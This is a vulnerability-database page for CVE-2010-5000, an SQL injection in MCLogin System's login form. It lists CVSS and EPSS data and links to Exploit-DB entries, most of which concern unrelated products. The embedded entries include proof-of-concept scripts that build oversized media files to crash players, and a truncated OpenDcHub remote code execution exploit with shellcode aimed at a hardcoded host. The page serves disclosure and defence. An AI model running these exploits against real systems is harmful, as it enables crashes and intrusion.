CVE-2010-5000
published 2011-11-02CVE-2010-5000: SQL injection vulnerability in login/login_index.php in MCLogin System 1.1 and 1.2 allows remote attackers to execute arbitrary SQL commands via the myusername…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
59.9th percentile
SQL injection vulnerability in login/login_index.php in MCLogin System 1.1 and 1.2 allows remote attackers to execute arbitrary SQL commands via the myusername parameter (aka Username field) in a do_login action. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joe_pieruccini | mclogin_system | — | — |
| joe_pieruccini | mclogin_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Office PowerPoint 2010 - Invalid Pointer Reference
exploitdb·2016-09-21
CVE-2016-3357 Microsoft Office PowerPoint 2010 - Invalid Pointer Reference
Microsoft Office PowerPoint 2010 - Invalid Pointer Reference
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000
Attached crashing file: 3525170180.ppt
Crashing context:
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
Call Stack:
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Followin
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
exploitdb·2015-09-16
CVE-2015-2520 Microsoft Office 2007 - BIFFRecord Length Use-After-Free
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=464
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls
The minimized crashing file shows two one bit deltas from the original file. The first delta at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offset appear to be BIFFRecord lengths.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=0000000
Exploit-DB
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
exploitdb·2015-09-16
CVE-2015-2521 Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one bit deltas from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Applicati
Exploit-DB
Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
exploitdb·2015-08-21
CVE-2015-2470 Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.
Attached files:
Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Exploit-DB
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
exploitdb·2010-12-04
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
---
# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
f = open("exploit.mp3",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"
Exploit-DB
Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)
exploitdb·2010-11-30
Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)
Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)
---
# Exploit Title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
# Date: 11/30/2010
# Author: 0v3r
# Software Link: http://www.clubdjpro.com/files/provj5.exe
# Version: 5.1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
f = open("exploit.m3u",'w')
f.write(buff)
f.close()
print "[-] File created!\n"
except:
print "[-] Error occured!\n"
Exploit-DB
CombiWave Lite 4.0.1.4 - Denial of Service
exploitdb·2010-08-12
CombiWave Lite 4.0.1.4 - Denial of Service
CombiWave Lite 4.0.1.4 - Denial of Service
---
# Exploit Title: CombiWave Lite v4.0.1.4 (.mws) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/combiwave-lite_2_219101.html?hl=&ia=0
# Version: v4.0.1.4
# Tested on: Windows XP SP 2
# CVE : N / A
#!/usr/bin/python
filename = "crash.mws"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
JaMP Player 4.2.2.0 - Denial of Service
exploitdb·2010-08-12
JaMP Player 4.2.2.0 - Denial of Service
JaMP Player 4.2.2.0 - Denial of Service
---
# Exploit Title: JaMP Player v4.2.2.0 (.m3u) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/jamp-player_2_219088.html?hl=&ia=0
# Version: v4.2.2.0
# Tested on: Windows XP SP 2
# CVE : N / A
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
RightMark Audio Analyzer 6.2.3 - Denial of Service
exploitdb·2010-08-11
RightMark Audio Analyzer 6.2.3 - Denial of Service
RightMark Audio Analyzer 6.2.3 - Denial of Service
---
# Exploit Title: RightMark Audio Analyzer 6.2.3 (.sav , .sac) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/rightmark-audio-analyzer_2_219034.html?hl=&ia=0
# Version: v6.2.3
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version from the official website
#!/usr/bin/python
# Create the malicious .sav or .sac file and boom ! The program crashes ! DEADBEEF !
filename = "crash.sav"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
Home of MCLogin System - Authentication Bypass
exploitdb·2010-06-08
CVE-2010-5000 Home of MCLogin System - Authentication Bypass
Home of MCLogin System - Authentication Bypass
---
Author: L0rd CrusAd3r
Published: 2010-06-08
Vendor url:-/www.maniacomputer.com
################################################################################################
Authentication Bypass in Home of MCLogin System
1,1
######################################Author:L0rd
CrusAd3r######################################
Description:-
With MCLogin System your visitors can login or register a new account. It is
written in PHP and the data is stored in a MySql database.Very easy to
install or to customize to meet your needs. You can add it to your pages
with just one link.
###################################################################################################
Vulnerability:-
*Authentication Bypass found
The Provided Sc
Exploit-DB
Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)
exploitdb·2010-05-23
Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)
Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)
---
# Exploit Title: [ Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc ]
# Date: [ 2010-05-22 ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0 ]
# Tested on: [ Windows xp2 , Windows xp3 , Windows 7 ]
# CVE : [if exists]
# Code : [
#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : [email protected] ------------- | #
# |--------------------------------------------------------------------------------------------------| #
$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
Exploit-DB
OpenDcHub 0.8.1 - Remote Code Execution
exploitdb·2010-03-31
CVE-2010-1147 OpenDcHub 0.8.1 - Remote Code Execution
OpenDcHub 0.8.1 - Remote Code Execution
---
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Plateforms :
# Unix
#
# Usage :
# ./exploit.py
import socket
host = '192.168.1.9'
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x
No writeups or analysis indexed.
http://packetstormsecurity.org/1006-exploits/mcloginsystem-sql.txthttp://secunia.com/advisories/40122http://securityreason.com/securityalert/8504http://www.exploit-db.com/exploits/13766/http://www.securityfocus.com/bid/40633http://packetstormsecurity.org/1006-exploits/mcloginsystem-sql.txthttp://secunia.com/advisories/40122http://securityreason.com/securityalert/8504http://www.exploit-db.com/exploits/13766/http://www.securityfocus.com/bid/40633
2011-11-02
Published